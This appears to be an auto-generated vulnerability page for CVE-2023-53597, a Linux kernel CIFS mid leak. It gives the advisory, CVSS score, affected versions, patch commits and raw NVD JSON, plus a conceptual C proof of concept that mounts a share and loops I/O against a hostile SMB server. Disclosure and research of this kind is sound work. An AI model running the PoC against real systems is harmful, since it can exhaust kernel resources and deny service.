Security Vulnerability Report
CVE-2023-53597 CVSS 5.5 MEDIUM

CVE-2023-53597

Published: 2025-10-04 16:15:56
Last Modified: 2026-03-23 18:21:31
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

cifs: fix mid leak during reconnection after timeout threshold

When the number of responses with status of STATUS_IO_TIMEOUT exceeds a specified threshold (NUM_STATUS_IO_TIMEOUT), we reconnect the connection. But we do not return the mid, or the credits returned for the mid, or reduce the number of in-flight requests.

This bug could result in the server->in_flight count going bad, and also cause a leak in the mids.

This change moves the check to a few lines below where the response is decrypted, even if the response is read from the transform header. This way, the code for returning the mids can be reused.

Also, the cifs_reconnect was reconnecting just the transport connection before. In case of multi-channel, this may not be what we want to do after several timeouts. Changed that to reconnect the session and the tree too.

Also renamed NUM_STATUS_IO_TIMEOUT to a more appropriate name MAX_STATUS_IO_TIMEOUT.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.9.5, before 5.15.150) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.16, before 6.1.42) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.2, before 6.4.7) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:* - VULNERABLE
Linux Kernel (for the exact affected versions, see the git.kernel.org patch links)
Fix commit: 57d25e9905c71133e201f6d06b56a3403d4ad433
Fix commit: 69cba9d3c1284e0838ae408830a02c4a063104bc
Fix commit: c55901d381a22300c9922170e59704059f50977b
Fix commit: df31d05f0678cdd0796ea19983a2b93edca18bb0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
// CVE-2023-53597 PoC - Conceptual demonstration
// This PoC demonstrates how to trigger the mid leak vulnerability
// by causing STATUS_IO_TIMEOUT responses from a CIFS server.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mount.h>
#include <fcntl.h>

// Number of STATUS_IO_TIMEOUT responses needed to trigger reconnection
// In vulnerable kernel, this constant was NUM_STATUS_IO_TIMEOUT
#define MAX_STATUS_IO_TIMEOUT 4

/*
 * Step 1: Mount a CIFS share from a controlled server
 * The malicious server will deliberately respond with STATUS_IO_TIMEOUT
 */
int mount_malicious_share(const char *share_path, const char *mount_point)
{
    char mount_opts[256];

    snprintf(mount_opts, sizeof(mount_opts),
             "username=guest,password=,iocharset=utf8");
    int ret = mount(share_path, mount_point, "cifs", 0, mount_opts);
    if (ret != 0) {
        perror("mount failed");
        return -1;
    }
    printf("Mounted %s at %s\n", share_path, mount_point);
    return 0;
}

/*
 * Step 2: Continuously perform I/O operations on the mounted share
 * Each operation will trigger STATUS_IO_TIMEOUT from the malicious server
 */
void trigger_timeout_leak(const char *mount_point)
{
    char file_path[256];
    char buffer[4096];
    int fd;

    // Zero the write buffer so no indeterminate stack contents are sent
    memset(buffer, 0, sizeof(buffer));

    // Loop to trigger enough timeouts to exceed MAX_STATUS_IO_TIMEOUT
    for (int i = 0; i < MAX_STATUS_IO_TIMEOUT * 10; i++) {
        snprintf(file_path, sizeof(file_path), "%s/testfile_%d", mount_point, i);
        // Attempt to open a file - this will trigger a CIFS request
        fd = open(file_path, O_RDWR | O_CREAT, 0644);
        if (fd >= 0) {
            // Write data - server responds with STATUS_IO_TIMEOUT
            write(fd, buffer, sizeof(buffer));
            close(fd);
        }
        // Small delay between operations
        usleep(100000);
    }
    printf("Triggered %d timeout responses\n", MAX_STATUS_IO_TIMEOUT * 10);
}

/*
 * Step 3: Monitor kernel for mid leaks
 * Check /proc/fs/cifs/Stats or kernel logs for evidence of resource exhaustion
 */
void check_leak_status(void)
{
    printf("Checking system status for mid leaks...\n");
    system("cat /proc/fs/cifs/Stats 2>/dev/null || echo 'Stats not available'");
    system("dmesg | grep -i 'cifs' | tail -20");
}

int main(int argc, char *argv[])
{
    if (argc < 3) {
        printf("Usage: %s <cifs_share> <mount_point>\n", argv[0]);
        printf("Example: %s //192.168.1.100/share /mnt/cifs\n", argv[0]);
        return 1;
    }

    printf("=== CVE-2023-53597 PoC ===\n");
    printf("Linux Kernel CIFS Mid Leak Vulnerability\n\n");

    if (mount_malicious_share(argv[1], argv[2]) != 0)
        return 1;

    trigger_timeout_leak(argv[2]);
    check_leak_status();

    // Cleanup
    umount(argv[2]);
    printf("\nPoC completed. Check kernel logs for mid leak evidence.\n");
    return 0;
}

/*
 * Server-side component (conceptual):
 * A malicious SMB/CIFS server should respond to requests with
 * NT_STATUS_IO_TIMEOUT status code. After receiving
 * MAX_STATUS_IO_TIMEOUT such responses, the vulnerable kernel
 * will trigger reconnection without properly releasing mids.
 */
```

References

https://git.kernel.org/stable/c/57d25e9905c71133e201f6d06b56a3403d4ad433 (Patch)
https://git.kernel.org/stable/c/69cba9d3c1284e0838ae408830a02c4a063104bc (Patch)
https://git.kernel.org/stable/c/c55901d381a22300c9922170e59704059f50977b (Patch)
https://git.kernel.org/stable/c/df31d05f0678cdd0796ea19983a2b93edca18bb0 (Patch)

Raw JSON Data

```json
{"cve": {"id": "CVE-2023-53597", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:56.270", "lastModified": "2026-03-23T18:21:30.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncifs: fix mid leak during reconnection after timeout threshold\n\nWhen the number of responses with status of STATUS_IO_TIMEOUT\nexceeds a specified threshold (NUM_STATUS_IO_TIMEOUT), we reconnect\nthe connection. But we do not return the mid, or the credits\nreturned for the mid, or reduce the number of in-flight requests.\n\nThis bug could result in the server->in_flight count to go bad,\nand also cause a leak in the mids.\n\nThis change moves the check to a few lines below where the\nresponse is decrypted, even of the response is read from the\ntransform header. This way, the code for returning the mids\ncan be reused.\n\nAlso, the cifs_reconnect was reconnecting just the transport\nconnection before. In case of multi-channel, this may not be\nwhat we want to do after several timeouts. Changed that to\nreconnect the session and the tree too.\n\nAlso renamed NUM_STATUS_IO_TIMEOUT to a more appropriate name\nMAX_STATUS_IO_TIMEOUT."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.9.5", "versionEndExcluding": "5.15.150", "matchCriteriaId": "B2D56558-DCDD-4670-9433-8C92DAD277A8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.42", "matchCriteriaId": "6E769E6A-7EEF-4FA8-BF41-6CA1CE537361"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.7", "matchCriteriaId": "60A1A1ED-EA6C-42F6-80D3-3316DC7608C7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:*", "matchCriteriaId": "0B3E6E4D-E24E-4630-B00C-8C9901C597B0"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/57d25e9905c71133e201f6d06b56a3403d4ad433", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/69cba9d3c1284e0838ae408830a02c4a063104bc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c55901d381a22300c9922170e59704059f50977b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/df31d05f0678cdd0796ea19983a2b93edca18bb0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
```